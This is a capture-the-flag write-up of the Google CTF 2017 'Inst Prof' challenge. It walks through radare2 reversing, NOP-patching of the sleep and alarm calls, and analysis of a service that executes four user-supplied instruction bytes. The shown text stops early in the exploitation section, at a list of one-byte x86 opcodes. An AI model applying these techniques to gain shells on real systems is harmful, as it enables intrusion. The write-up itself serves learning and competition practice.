GoogleCTF 2017: Inst Prof 152 (final value)
This was a very enjoyable and well thought out challenge from Google CTF. I'd never participated in a Google CTF before, and my expectations were high in terms of difficulty. Needless to say, I was not disappointed in the difficulty department. About halfway through I began thinking of this challenge as the "Instruction Professor" - as in, x86-64 assembly instruction - due to the inordinate amount of x86 assembly I was manually typing out and grokking.
Despite the extremely low-level nature of the work, I had tons of fun solving this challenge, and learned quite a bit more about Linux, memory, and myself in the process.
If you're just looking for my solution itself (instead of a journaling of my process), simply click here to jump to the solution. If, however, you'd like a little insight into my thought process and techniques involved, please read on.
I've split this writeup into two parts, Reversing and Pwning.
- Reversing - In this section I'll go over how I use radare2 to understand how the challenge works. I provide examples and explanations of commands where I can. This section is geared toward those who are less familiar with radare2 or with assembly/reversing in general.
- Pwning - This section will illustrate how the challenge program was exploited. I'll go over some early strategies and discoveries that were made, as well as what the solution script does in detail.
Reversing the Binary
After firing up the scoreboard on Friday, I saw the lowest point pwn challenge was Inst Prof, so I puzzled briefly over the flavor text and downloaded the binary:
Please help test our new compiler micro-service
Challenge running at inst-prof.ctfcompetition.com:1337
I took a look at some of the details of the binary:
-> % checksec --file ./inst_prof
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Partial RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH ./inst_prof
-> % file ./inst_prof
./inst_prof: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,
for GNU/Linux 2.6.24, BuildID[sha1]=61e50b540c3c8e7bcef3cb73f3ad2a10c2589089, not stripped
The thing that stood out to me was that PIE (Position Independent Executable) was turned on, and that NX (No eXecute) was set. Undeterred, I proceeded to shift into mad (computer) scientist mode, and started poking the beast.
I went ahead and ran the program to see what it did. It seemed to sleep() for a few seconds before printing ready:
-> % ./inst_prof
initializing prof...ready
HERPDERP
[1] 19938 segmentation fault (core dumped) ./inst_prof.bak
My most immediate thought was that I needed to get rid of the sleep(); otherwise playing with the binary would be a pain every time I started it up. So that was step 1:
Brain Surgery
I opened the binary with radare2 using r2 -d inst_prof to get a better look at what was happening:
[0x7f6844843d80]> s main
[0x559b6f54c860]> pd 30
;-- main:
;-- section_end..plt:
;-- section..text:
;-- main:
0x559b6f54c860 55 push rbp ; section 13 va=0x559b6f54c860 pa=0x00000860 sz=882 vsz=882 rwx=--r-x .text
0x559b6f54c861 488d357c0300. lea rsi, qword str.initializing_prof... ; 0x559b6f54cbe4 ; "initializing prof..."
0x559b6f54c868 ba14000000 mov edx, 0x14 ; 20
0x559b6f54c86d bf01000000 mov edi, 1
0x559b6f54c872 4889e5 mov rbp, rsp
0x559b6f54c875 e836ffffff call sym.imp.write
0x559b6f54c87a 4883f814 cmp rax, 0x14 ; 20
,=< 0x559b6f54c87e 7407 je 0x559b6f54c887
.--> 0x559b6f54c880 31ff xor edi, edi
|| 0x559b6f54c882 e8a9ffffff call sym.imp.exit
|`-> 0x559b6f54c887 bf05000000 mov edi, 5
| 0x559b6f54c88c e8afffffff call sym.imp.sleep
| 0x559b6f54c891 bf1e000000 mov edi, 0x1e ; 30
| 0x559b6f54c896 e835ffffff call sym.imp.alarm
| 0x559b6f54c89b 488d35570300. lea rsi, qword str.ready_n ; 0x559b6f54cbf9 ; "ready\n"
| 0x559b6f54c8a2 ba06000000 mov edx, 6
| 0x559b6f54c8a7 bf01000000 mov edi, 1
| 0x559b6f54c8ac e8fffeffff call sym.imp.write
| 0x559b6f54c8b1 4883f806 cmp rax, 6 ; 6
`==< 0x559b6f54c8b5 75c9 jne 0x559b6f54c880
0x559b6f54c8b7 660f1f840000. nop word [rax + rax]
.-> 0x559b6f54c8c0 31c0 xor eax, eax
| 0x559b6f54c8c2 e8f9010000 call sym.do_test
`=< 0x559b6f54c8c7 ebf7 jmp 0x559b6f54c8c0
s lets you seek to an address (or symbol)
pd # lets you print disassembly of # instructions (from current seek)
Above is the disassembly output of the main function. My eyes were drawn to three lines: the calls to sleep(), alarm(), and do_test().
From past CTF experience I knew that sleep() and alarm() were both used as mild deterrents that could easily be disabled. If we look at the first argument to each of these functions (in the edi register), we'll see that they take five and thirty seconds respectively.
Five seconds was the delay experienced after seeing the initializing prof... message, and indeed we can see above that both the sleep and alarm calls occur between the two writes to STDOUT.
Before moving on to inspecting the do_test function, I performed my first operation:
-> % r2 -w inst_prof
[0x000008c9]> wx 9090909090 @ 0x88c
[0x000008c9]> wx 9090909090 @ 0x896
[0x000008c9]> s main
[0x00000860]> pd 32
;-- main:
;-- section_end..plt:
;-- section..text:
;-- main:
0x00000860 55 push rbp ; section 13 va=0x00000860 pa=0x00000860 sz=882 vsz=882 rwx=--r-x .text
0x00000861 488d357c0300. lea rsi, qword str.initializing_prof... ; 0xbe4 ; "initializing prof..."
0x00000868 ba14000000 mov edx, 0x14
0x0000086d bf01000000 mov edi, 1
0x00000872 4889e5 mov rbp, rsp
0x00000875 e836ffffff call sym.imp.write
0x0000087a 4883f814 cmp rax, 0x14
,=< 0x0000087e 7407 je 0x887
.--> 0x00000880 31ff xor edi, edi
|| 0x00000882 e8a9ffffff call sym.imp.exit
|`-> 0x00000887 bf05000000 mov edi, 5
| 0x0000088c 90 nop
| 0x0000088d 90 nop
| 0x0000088e 90 nop
| 0x0000088f 90 nop
| 0x00000890 90 nop
| 0x00000891 bf1e000000 mov edi, 0x1e
| 0x00000896 90 nop
| 0x00000897 90 nop
| 0x00000898 90 nop
| 0x00000899 90 nop
| 0x0000089a 90 nop
| 0x0000089b 488d35570300. lea rsi, qword str.ready_n ; 0xbf9 ; "ready\n"
| 0x000008a2 ba06000000 mov edx, 6
| 0x000008a7 bf01000000 mov edi, 1
| 0x000008ac e8fffeffff call sym.imp.write
| 0x000008b1 4883f806 cmp rax, 6
`==< 0x000008b5 75c9 jne 0x880
0x000008b7 660f1f840000. nop word [rax + rax]
.-> 0x000008c0 31c0 xor eax, eax
| 0x000008c2 e8f9010000 call sym.do_test
`=< 0x000008c7 ebf7 jmp 0x8c0
Invoking radare2 with the -w switch opens the binary file in write mode, allowing radare2 to write data to the file.
The wx command is short for write hex, and allows for writing raw bytes to an offset specified by either the current seek or @ a temporary seek offset.
Notice that the addresses (left column) no longer represent virtual addresses of a process, but rather offsets relative to the start of the file on disk. Then notice that the least significant 12 bits are the same in the file as in the process! This is because the base address at which the binary is loaded (when it becomes a process) is page-aligned, so its least significant 12 bits are always unset (all 0's).
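As a quick sanity check of the page-alignment observation, here is a minimal Python sketch. It uses the two addresses of main from the listings above; the helper name page_offset is hypothetical, and the 4 KiB page size is an assumption (typical for x86-64 Linux).

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages, typical on x86-64 Linux

def page_offset(addr: int) -> int:
    """Return the low 12 bits of an address (its offset inside a page)."""
    return addr & (PAGE_SIZE - 1)

runtime_main = 0x559b6f54c860  # main as seen in the debugged process
file_main = 0x860              # main as seen in the file opened with r2 -w

print(hex(page_offset(runtime_main)), hex(page_offset(file_main)))

# Subtracting the file offset from the runtime address gives the load base,
# which should itself be page-aligned.
load_base = runtime_main - file_main
print(hex(load_base), page_offset(load_base) == 0)
```

The same subtraction is what makes PIE manageable: one leaked runtime address plus a known file offset is enough to recover the load base.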
We can see that the two commands issued wrote 0x90 five times at each of the addresses 0x88c and 0x896, which fully overwrote both the sleep and alarm calls with nops. So now the binary will no longer pause or get the alarm signal sent to it (which may or may not have broken something later down the road).
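The same patch can be expressed outside of radare2. Below is a minimal Python sketch, assuming the file offsets 0x88c and 0x896 from the listing above; nop_out is a hypothetical helper, and the buffer is a zero-filled stand-in rather than the real binary so the example runs on its own.

```python
NOP = 0x90

def nop_out(image: bytearray, offset: int, length: int) -> None:
    """Overwrite `length` bytes starting at `offset` with NOPs, in place."""
    image[offset:offset + length] = bytes([NOP]) * length

# Stand-in buffer holding only the two 5-byte call instructions
# at the file offsets shown in the disassembly.
image = bytearray(0x900)
image[0x88c:0x891] = bytes.fromhex("e8afffffff")  # call sym.imp.sleep
image[0x896:0x89b] = bytes.fromhex("e835ffffff")  # call sym.imp.alarm

nop_out(image, 0x88c, 5)
nop_out(image, 0x896, 5)
print(image[0x88c:0x891].hex(), image[0x896:0x89b].hex())
```

To patch a real file, one would read it into a bytearray, apply the same two calls, and write the result to a copy so the original binary stays untouched.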
Under the Microscope
Now that the speed bumps were removed, it was time to take a look at the do_test function. I took note that the instruction after the call to do_test is an unconditional jmp back to the instruction that clears the eax register just before calling the same function: an endless loop.
Then I disassembled the function:
[0x562bd0896860]> pd @ sym.do_test
;-- do_test:
0x562bd0896ac0 55 push rbp
0x562bd0896ac1 31c0 xor eax, eax
0x562bd0896ac3 4889e5 mov rbp, rsp
0x562bd0896ac6 4154 push r12
0x562bd0896ac8 53 push rbx
0x562bd0896ac9 4883ec10 sub rsp, 0x10
0x562bd0896acd e81effffff call sym.alloc_page
0x562bd0896ad2 4889c3 mov rbx, rax
0x562bd0896ad5 488d05240100. lea rax, qword sym.template ; obj.template ; 0x562bd0896c00
0x562bd0896adc 488d7b05 lea rdi, qword [rbx + 5] ; 5
0x562bd0896ae0 488b10 mov rdx, qword [rax]
0x562bd0896ae3 488913 mov qword [rbx], rdx
0x562bd0896ae6 8b5008 mov edx, dword [rax + 8] ; [0x8:4]=-1 ; 8
0x562bd0896ae9 895308 mov dword [rbx + 8], edx
0x562bd0896aec 0fb7500c movzx edx, word [rax + 0xc] ; [0xc:2]=0xffff ; 12
0x562bd0896af0 0fb6400e movzx eax, byte [rax + 0xe] ; [0xe:1]=255 ; 14
0x562bd0896af4 6689530c mov word [rbx + 0xc], dx
0x562bd0896af8 88430e mov byte [rbx + 0xe], al
0x562bd0896afb e8b0ffffff call sym.read_inst
0x562bd0896b00 4889df mov rdi, rbx
0x562bd0896b03 e818ffffff call sym.make_page_executable
0x562bd0896b08 0f31 rdtsc
0x562bd0896b0a 48c1e220 shl rdx, 0x20
0x562bd0896b0e 4989c4 mov r12, rax
0x562bd0896b11 31c0 xor eax, eax
0x562bd0896b13 4909d4 or r12, rdx
0x562bd0896b16 ffd3 call rbx
0x562bd0896b18 0f31 rdtsc
0x562bd0896b1a bf01000000 mov edi, 1
0x562bd0896b1f 48c1e220 shl rdx, 0x20
0x562bd0896b23 488d75e8 lea rsi, qword [rbp - 0x18]
0x562bd0896b27 4809c2 or rdx, rax
0x562bd0896b2a 4c29e2 sub rdx, r12
0x562bd0896b2d 488955e8 mov qword [rbp - 0x18], rdx
0x562bd0896b31 ba08000000 mov edx, 8
0x562bd0896b36 e875fcffff call sym.imp.write
0x562bd0896b3b 4883f808 cmp rax, 8 ; 8
,=< 0x562bd0896b3f 7511 jne 0x562bd0896b52
| 0x562bd0896b41 4889df mov rdi, rbx
| 0x562bd0896b44 e8f7feffff call sym.free_page
| 0x562bd0896b49 4883c410 add rsp, 0x10
| 0x562bd0896b4d 5b pop rbx
| 0x562bd0896b4e 415c pop r12
| 0x562bd0896b50 5d pop rbp
| 0x562bd0896b51 c3 ret
`-> 0x562bd0896b52 31ff xor edi, edi
0x562bd0896b54 e8d7fcffff call sym.imp.exit
0x562bd0896b59 0f1f80000000. nop dword [rax]
We can see above in the disassembly the calls that do_test makes. Of particular interest is the call rbx instruction which comes after the call to make_page_executable. Without digging deeper, my assumption for why the program crashed was that it was expecting me to input x86 instructions (in read_inst) that would get executed (after make_page_executable), which HERPDERP definitely was not.
To see if this was right, I needed to look at the three calls before the one to rbx.
Pagemaster
First I looked at alloc_page:
[0x5635884f4ac0]> pd @ sym.alloc_page
||| ;-- alloc_page:
||| 0x5635884f49f0 55 push rbp
||| 0x5635884f49f1 4531c9 xor r9d, r9d
||| 0x5635884f49f4 41b8ffffffff mov r8d, 0xffffffff ; -1
||| 0x5635884f49fa b922000000 mov ecx, 0x22 ; '"' ; 34
||| 0x5635884f49ff ba03000000 mov edx, 3
||| 0x5635884f4a04 be00100000 mov esi, 0x1000
||| 0x5635884f4a09 4889e5 mov rbp, rsp
||| 0x5635884f4a0c 31ff xor edi, edi
||| 0x5635884f4a0e 5d pop rbp
||`=< 0x5635884f4a0f e9acfdffff jmp sym.imp.mmap
|| 0x5635884f4a14 6666662e0f1f. nop word cs:[rax + rax]
I saw that it made a call to mmap. Looking at the man page for mmap using man 2 mmap revealed the function signature:
void *mmap(void *addr, size_t length, int prot, int flags,
int fd, off_t offset);
as well as some additional information about the parameters, especially the prot parameter, which is supplied as a bitwise OR of the following:
-> % cat /usr/include/bits/mman-linux.h | grep -P '#define\s+PROT'
#define PROT_READ 0x1 /* Page can be read. */
#define PROT_WRITE 0x2 /* Page can be written. */
#define PROT_EXEC 0x4 /* Page can be executed. */
#define PROT_NONE 0x0 /* Page can not be accessed. */
#define PROT_GROWSDOWN 0x01000000 /* Extend change to start of
#define PROT_GROWSUP 0x02000000 /* Extend change to start of
Since we know that integer arguments on x86-64 (System V calling convention) are supplied in the registers rdi, rsi, rdx, rcx, r8, r9, we can see the call to mmap is made as:
mmap(0, 0x1000, PROT_READ | PROT_WRITE, 0x22, 0xffffffff, 0)
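This creates a new mapped region of memory that is 0x1000 bytes large, at a starting address chosen by the kernel, that is readable and writable. The flags value 0x22 is MAP_PRIVATE | MAP_ANONYMOUS, so the region is not backed by a file (hence the fd of -1). The start address of the mmaped region is returned in the rax register.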
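To double-check a decoding like this, a small Python sketch can map the register values back to named flags. The constants are the Linux x86-64 values, hard-coded here so the sketch runs anywhere; decode_flags and as_int32 are hypothetical helper names.

```python
# Linux x86-64 values, hard-coded so the sketch does not depend on the host OS
PROT = {0x1: "PROT_READ", 0x2: "PROT_WRITE", 0x4: "PROT_EXEC"}
MAP = {0x01: "MAP_SHARED", 0x02: "MAP_PRIVATE",
       0x10: "MAP_FIXED", 0x20: "MAP_ANONYMOUS"}

def decode_flags(value: int, names: dict) -> str:
    """Render a bitmask as an OR of the known flag names."""
    parts = [name for bit, name in sorted(names.items()) if value & bit]
    return " | ".join(parts) if parts else "0"

def as_int32(value: int) -> int:
    """Interpret a 32-bit register value as a signed C int."""
    return value - (1 << 32) if value & 0x80000000 else value

# Register values set up by alloc_page, in argument order
regs = {"edi": 0, "esi": 0x1000, "edx": 3, "ecx": 0x22,
        "r8d": 0xffffffff, "r9d": 0}

print("addr   =", regs["edi"])
print("length =", hex(regs["esi"]))
print("prot   =", decode_flags(regs["edx"], PROT))
print("flags  =", decode_flags(regs["ecx"], MAP))
print("fd     =", as_int32(regs["r8d"]))
print("offset =", regs["r9d"])
```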
Looking back at the above disassembly of do_test, I saw after the alloc_page call that something was occurring before the read_inst call involving something that radare labeled as obj.template.
Before trying to understand the code, I took a look at obj.template:
[0x5635884f4ac0]> pxq 0x10 @ obj.template
0x5635884f4c00 0x90909000001000b9 0x00c3f77501e98390 ............u...
[0x5635884f4ac0]> pd 8 @ obj.template
;-- template:
0x5635884f4c00 b900100000 mov ecx, 0x1000
.-> 0x5635884f4c05 90 nop
| 0x5635884f4c06 90 nop
| 0x5635884f4c07 90 nop
| 0x5635884f4c08 90 nop
| 0x5635884f4c09 83e901 sub ecx, 1
`=< 0x5635884f4c0c 75f7 jne 0x5635884f4c05
0x5635884f4c0e c3 ret
The pxq # command prints # bytes as hex quadwords (in little endian) at the offset specified (obj.template in this case).
Hmm, it looks as if obj.template is a loop of some sort. It appears to execute nop four times in a loop which repeats 0x1000 times.
Taking a long look at the assembly which references obj.template gave me an understanding of what the code did with it:
0x5635884f4acd e81effffff call sym.alloc_page
0x5635884f4ad2 4889c3 mov rbx, rax ;save addr of new page (from rax)
0x5635884f4ad5 488d05240100. lea rax, qword obj.template ;load obj.template addr
0x5635884f4adc 488d7b05 lea rdi, qword [rbx + 5] ;seek 5 into new page
0x5635884f4ae0 488b10 mov rdx, qword [rax] ;copy first 8 bytes of obj.template
0x5635884f4ae3 488913 mov qword [rbx], rdx ;paste them into new page
0x5635884f4ae6 8b5008 mov edx, dword [rax + 8] ;copy template bytes 0x8 to 0xb
0x5635884f4ae9 895308 mov dword [rbx + 8], edx ;paste into bytes 0x8 to 0xb
0x5635884f4aec 0fb7500c movzx edx, word [rax + 0xc] ;copy template bytes 0xc and 0xd
0x5635884f4af0 0fb6400e movzx eax, byte [rax + 0xe] ;copy last template byte
0x5635884f4af4 6689530c mov word [rbx + 0xc], dx ;paste template bytes 0xc and 0xd
0x5635884f4af8 88430e mov byte [rbx + 0xe], al ;paste last template byte (0xe)
0x5635884f4afb e8b0ffffff call sym.read_inst
If that was still unclear, essentially the 15 template bytes are copied into the start of the newly allocated page we got from alloc_page.
Up to this point I'd only been looking at the code statically; however, I decided to run it to check my understanding. I ran the code after setting breakpoints on both the alloc_page and read_inst calls:
[0x5635884f4ac0]> db 0x5635884f4acd
[0x5635884f4ac0]> db 0x5635884f4afb
[0x5635884f4ac0]> dc
Selecting and continuing: 2864
initializing prof...ready
hit breakpoint at: 5635884f4acd
[0x5635884f4acd]> dr rax
0x00000000
[0x5635884f4acd]> dso
hit breakpoint at: 5635884f4ad2
[0x5635884f4acd]> dr rax
0x7f0f9b91c000
[0x5635884f4acd]> pxq 0x10 @ 0x7f0f9b91c000
0x7f0f9b91c000 0x0000000000000000 0x0000000000000000 ................
[0x5635884f4acd]> dc
Selecting and continuing: 2864
hit breakpoint at: 5635884f4afb
[0x5635884f4acd]> pxq 0x10 @ 0x7f0f9b91c000
0x7f0f9b91c000 0x90909000001000b9 0x00c3f77501e98390 ............u...
db is the debug breakpoint command; dc is the debug continue command
dr is the debug register command; dso is the debug step over command
From the above output I verified that the obj.template data was copied into the region mapped by alloc_page, and using the dm (debug memory [map]) command showed me that a new page had been mapped for the process (the unk2 region annotated with rbx):
[0x5635884f4acd]> dm
sys 4K 0x00005635884f4000 * 0x00005635884f5000 s -r-x /googleCTF_06-2017/pwn_inst-prof/inst_prof ; map._googleCTF_06_2017_pwn_inst_prof_inst_prof._r_x
sys 4K 0x00005635886f5000 - 0x00005635886f6000 s -r-- /googleCTF_06-2017/pwn_inst-prof/inst_prof ; map._googleCTF_06_2017_pwn_inst_prof_inst_prof._rw_
sys 4K 0x00005635886f6000 - 0x00005635886f7000 s -rw- /googleCTF_06-2017/pwn_inst-prof/inst_prof ; obj._GLOBAL_OFFSET_TABLE_
sys 1.6M 0x00007f0f9b357000 - 0x00007f0f9b4f2000 s -r-x /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys 2.0M 0x00007f0f9b4f2000 - 0x00007f0f9b6f1000 s ---- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys 16K 0x00007f0f9b6f1000 - 0x00007f0f9b6f5000 s -r-- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys 8K 0x00007f0f9b6f5000 - 0x00007f0f9b6f7000 s -rw- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys 16K 0x00007f0f9b6f7000 - 0x00007f0f9b6fb000 s -rw- unk0 unk0
sys 140K 0x00007f0f9b6fb000 - 0x00007f0f9b71e000 s -r-x /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so ; map._usr_lib_ld_2.25.so._r_x
sys 8K 0x00007f0f9b8cc000 - 0x00007f0f9b8ce000 s -rw- unk1 unk1
sys 4K 0x00007f0f9b91c000 - 0x00007f0f9b91d000 s -rw- unk2 unk2 ; rbx
sys 4K 0x00007f0f9b91d000 - 0x00007f0f9b91e000 s -r-- /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so ; map._usr_lib_ld_2.25.so._rw_
sys 4K 0x00007f0f9b91e000 - 0x00007f0f9b91f000 s -rw- /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so
sys 4K 0x00007f0f9b91f000 - 0x00007f0f9b920000 s -rw- unk3 unk3 ; map.unk0._rw_
sys 132K 0x00007ffc046ac000 - 0x00007ffc046cd000 s -rw- [stack] [stack] ; map._stack_._rw_
sys 8K 0x00007ffc0479e000 - 0x00007ffc047a0000 s -r-- [vvar] [vvar] ; map._vvar_._r__
sys 8K 0x00007ffc047a0000 - 0x00007ffc047a2000 s -r-x [vdso] [vdso] ; map._vdso_._r_x
sys 4K 0xffffffffff600000 - 0xffffffffff601000 s -r-x [vsyscall] [vsyscall] ; map._vsyscall_._r_x
So far, so good. Now I just had to look at and understand the remaining two functions in do_test: read_inst and make_page_executable.
Instruct Radare
[0x562e80db3ab0]> pd 6 @ sym.read_inst
/ (fcn) sym.read_inst 63
| sym.read_inst ();
| | ; CALL XREF from 0x562e80db3afb (sym.do_test)
| | 0x562e80db3ab0 55 push rbp
| | 0x562e80db3ab1 be04000000 mov esi, 4
| | 0x562e80db3ab6 4889e5 mov rbp, rsp
| | 0x562e80db3ab9 5d pop rbp
\ `=< 0x562e80db3aba e9c1ffffff jmp sym.read_n
0x562e80db3abf 90 nop
[0x562e80db3ab0]> pd @ sym.read_n
.-> ;-- read_n:
| ; JMP XREF from 0x562e80db3aba (sym.read_inst)
| .-> 0x562e80db3a80 55 push rbp
| | 0x562e80db3a81 4885f6 test rsi, rsi
| | 0x562e80db3a84 4889e5 mov rbp, rsp
| | 0x562e80db3a87 4154 push r12
| | 0x562e80db3a89 4c8d2437 lea r12, qword [rdi + rsi]
| | 0x562e80db3a8d 53 push rbx
| | 0x562e80db3a8e 4889fb mov rbx, rdi
| ,==< 0x562e80db3a91 7418 je 0x562e80db3aab
| || 0x562e80db3a93 0f1f440000 nop dword [rax + rax]
| .---> 0x562e80db3a98 31c0 xor eax, eax
| ||| 0x562e80db3a9a 4883c301 add rbx, 1
| ||| 0x562e80db3a9e e8adffffff call sym.read_byte ; ssize_t read(int fildes, void *buf, size_t nbyte)
| ||| 0x562e80db3aa3 8843ff mov byte [rbx - 1], al
| ||| 0x562e80db3aa6 4c39e3 cmp rbx, r12
| `===< 0x562e80db3aa9 75ed jne 0x562e80db3a98
| `--> 0x562e80db3aab 5b pop rbx
| | 0x562e80db3aac 415c pop r12
| | 0x562e80db3aae 5d pop rbp
| | 0x562e80db3aaf c3 ret
We can see from the disassembly of read_inst above that the value 4 is passed via the rsi register to read_n.
In the read_n function, rsi is immediately tested, which sets the ZF flag if it is 0; in that case the je at address 0x562e80db3a91 skips the loop and the function returns right away. In our case it's always 4, and so the value is combined with rdi by the instruction lea r12, qword [rdi + rsi], which leaves the end address of the destination buffer in r12.
r12 is compared against rbx just before the jne at 0x562e80db3aa9, and essentially bounds how many times call sym.read_byte is executed: rbx advances by one byte per iteration, and the function returns once the number of bytes passed via rsi (0x4 in our case) has been read.
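The loop is easier to follow as a Python model. This is a sketch of the logic only, with io.BytesIO standing in for STDIN; the buffer layout (15 bytes, write starting at offset 5) is taken from do_test, and the byte-reading helper is simplified from the disassembly of read_byte.

```python
import io

def read_byte(stream) -> int:
    """Read exactly one byte; bail out like the binary does on a short read."""
    data = stream.read(1)
    if len(data) != 1:
        raise SystemExit(0)  # the binary calls exit(0) here
    return data[0]

def read_n(stream, buf: bytearray, start: int, count: int) -> None:
    """Fill buf[start:start + count] one byte at a time."""
    cursor = start        # plays the role of rbx
    end = start + count   # plays the role of r12 (rdi + rsi)
    while cursor != end:  # also covers the count == 0 early exit
        buf[cursor] = read_byte(stream)
        cursor += 1

page = bytearray(15)
read_n(io.BytesIO(b"\xc3\xc3\xc3\xc3extra"), page, 5, 4)
print(page.hex())
```

Only the first four bytes of the stream are consumed; anything after them stays queued for the next pass through do_test.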
Looking at the read_byte
function reveals:
[0x562e80db3ab0]> pd @ sym.read_byte
/ (fcn) sym.read_byte 47
| sym.read_byte ();
| ; var int local_1h @ rbp-0x1
| ; CALL XREF from 0x562e80db3a9e (sym.read_inst)
| 0x562e80db3a50 55 push rbp
| 0x562e80db3a51 31ff xor edi, edi
| 0x562e80db3a53 ba01000000 mov edx, 1
| 0x562e80db3a58 4889e5 mov rbp, rsp
| 0x562e80db3a5b 4883ec10 sub rsp, 0x10
| 0x562e80db3a5f 488d75ff lea rsi, qword [local_1h]
| 0x562e80db3a63 c645ff00 mov byte [local_1h], 0
| 0x562e80db3a67 e874fdffff call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
| 0x562e80db3a6c 4883f801 cmp rax, 1 ; 1
| ,=< 0x562e80db3a70 7506 jne 0x562e80db3a78
| | 0x562e80db3a72 0fb645ff movzx eax, byte [local_1h]
| | 0x562e80db3a76 c9 leave
| | 0x562e80db3a77 c3 ret
| `-> 0x562e80db3a78 31ff xor edi, edi
\ 0x562e80db3a7a e8b1fdffff call sym.imp.exit ; void exit(int status)
0x562e80db3a7f 90 nop
Here we finally see the call to sym.imp.read, which is the libc function that reads a number of bytes from a file descriptor.
I set a breakpoint on the call to read shown above to see what its parameters were:
[0x562e80db3ab0]> db 0x562e80db3a67
[0x562e80db3a67]> pd 1
| ;-- rip:
| 0x562e80db3a67 b e874fdffff call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
[0x562e80db3a67]> dr rdi; dr rsi; dr rdx
0x00000000
0x7ffd632550af
0x00000001
We can see that it's reading from fd 0 (file descriptor 0) which is STDIN. It's reading into memory address 0x7ffd632550af, and reading only a single byte.
After reading a single character from STDIN, it returns the character in eax, which read_n writes to [rbx - 1].
I let the process run 4 times, sending 0xc3 each time, and stepped back out until I was in do_test, where I found that the 4 bytes are read into the copied obj.template, which is stored at the address in rbx:
[0x55cc2a53eaf8]> pd 8 @ rbx
;-- map.unk2._rw_:
;-- rbx:
0x7feffd3ea000 b900100000 mov ecx, 0x1000
,=> 0x7feffd3ea005 c3 ret
| 0x7feffd3ea006 c3 ret
| 0x7feffd3ea007 c3 ret
| 0x7feffd3ea008 c3 ret
| 0x7feffd3ea009 83e901 sub ecx, 1
`-< 0x7feffd3ea00c 75f7 jne 0x7feffd3ea005
0x7feffd3ea00e c3 ret
Notice that the 4 nop instructions from the template were overwritten with the bytes I supplied (0xc3 in this case).
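Putting the template copy and the 4-byte read together, the page contents can be modeled in a few lines of Python. The template bytes are taken from the pxq dump of obj.template above; build_page is a hypothetical helper name.

```python
# 15 template bytes: mov ecx, 0x1000 / 4 x nop / sub ecx, 1 / jne / ret
TEMPLATE = bytes.fromhex("b900100000" "90909090" "83e901" "75f7" "c3")

def build_page(inst: bytes) -> bytes:
    """Return the template with its four nops replaced by `inst`."""
    if len(inst) != 4:
        raise ValueError("read_inst always reads exactly 4 bytes")
    return TEMPLATE[:5] + inst + TEMPLATE[9:]

print(build_page(b"\xc3" * 4).hex())
```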
Feeling comfortable that I understood everything so far, I took a look at make_page_executable.
It'll Give You Wings
Looking at do_test, we see that just prior to calling make_page_executable, the address of our copied template (stored in rbx) is moved into rdi:
[0x55cc2a53eb00]> pd 2
| ;-- rip:
| 0x55cc2a53eb00 4889df mov rdi, rbx
| 0x55cc2a53eb03 e818ffffff call sym.make_page_executable
Then when we look at make_page_executable:
[0x55cc2a53eb00]> pd @ sym.make_page_executable
/ (fcn) sym.make_page_executable 20
| sym.make_page_executable ();
| || ; CALL XREF from 0x55cc2a53eb03 (sym.do_test)
| || 0x55cc2a53ea20 55 push rbp
| || 0x55cc2a53ea21 ba05000000 mov edx, 5
| || 0x55cc2a53ea26 be00100000 mov esi, 0x1000
| || 0x55cc2a53ea2b 4889e5 mov rbp, rsp
| || 0x55cc2a53ea2e 5d pop rbp
\ `==< 0x55cc2a53ea2f e9ecfdffff jmp sym.imp.mprotect
We see that it is just a wrapper around mprotect, which has the signature:
int mprotect(void *addr, size_t len, int prot)
This wrapped call to mprotect uses the address in rdi (our copied template with 4 custom instruction bytes) as the target address. len is set via rsi being 0x1000, which is a 4k page, and prot is set via rdx being 0x05 (PROT_READ | PROT_EXEC), which marks the region as readable and executable but no longer writable.
Back in do_test, we see that rbx (which also holds the address of our copied template) is directly called, which will execute our 4 bytes worth of instructions in a loop of 0x1000 iterations before returning.
Once this is done, do_test executes rdtsc a second time, subtracts the earlier cycle count saved in r12, and calls write to send the 8-byte difference to STDOUT. I didn't pay this much attention while solving the challenge, and would only later learn that I could have used this functionality to leak data from the process.
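For anyone parsing that output on the client side, here is a minimal Python sketch of the arithmetic. The edx/eax pairs are made-up sample values; combine_tsc and parse_timing are hypothetical names. rdtsc returns the counter split across edx (high half) and eax (low half), and the binary writes the 64-bit difference in little-endian byte order.

```python
import struct

def combine_tsc(edx: int, eax: int) -> int:
    """Rebuild the 64-bit counter the way do_test does: (rdx << 32) | rax."""
    return (edx << 32) | eax

def parse_timing(raw: bytes) -> int:
    """Decode the 8 bytes written by do_test as a little-endian uint64."""
    (delta,) = struct.unpack("<Q", raw)
    return delta

# Made-up sample readings taken before and after `call rbx`
start = combine_tsc(0x1, 0xfffffff0)
end = combine_tsc(0x2, 0x00000010)

# Wrap to 64 bits, like `sub rdx, r12` would
delta = (end - start) & 0xffffffffffffffff
wire = struct.pack("<Q", delta)  # what would arrive on STDOUT
print(wire.hex(), parse_timing(wire))
```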
After this, the executable page holding the loop and our custom bytes is freed, and the process is endlessly repeated with subsequent calls to do_test.
Pwnsploitation
The next day I met up with my friend Ambrose and we teamed up to go over our understanding of the binary as presented above, as well as to start in on the exploitation process.
After we had a solid understanding of what the binary did, the challenge was (seemingly) simple: we had to figure out how to use 1, 2, 3, and 4 byte assembly instructions to get a shell.
The first thing I did was generate a list of all 1 and 2 byte assembly instructions using the rasm2 binary that comes with radare, just to get an idea of what kind of instructions we'd be able to use:
-> % (python3 -c 'print("\n".join([hex(x)[2:].zfill(2) for x in range(256)]))' | while read i; do echo -n "$i = ";
rasm2 -ax86 -b64 -d "$i"; done;) | grep -v invalid
50 = push rax
51 = push rcx
52 = push rdx
53 = push rbx
54 = push rsp
55 = push rbp
56 = push rsi
57 = push rdi
58 = pop rax
59 = pop rcx
5a = pop rdx
5b = pop rbx
5c = pop rsp
5d = pop rbp
5e = pop rsi
5f = pop rdi
6c = insb byte [rdi], dx
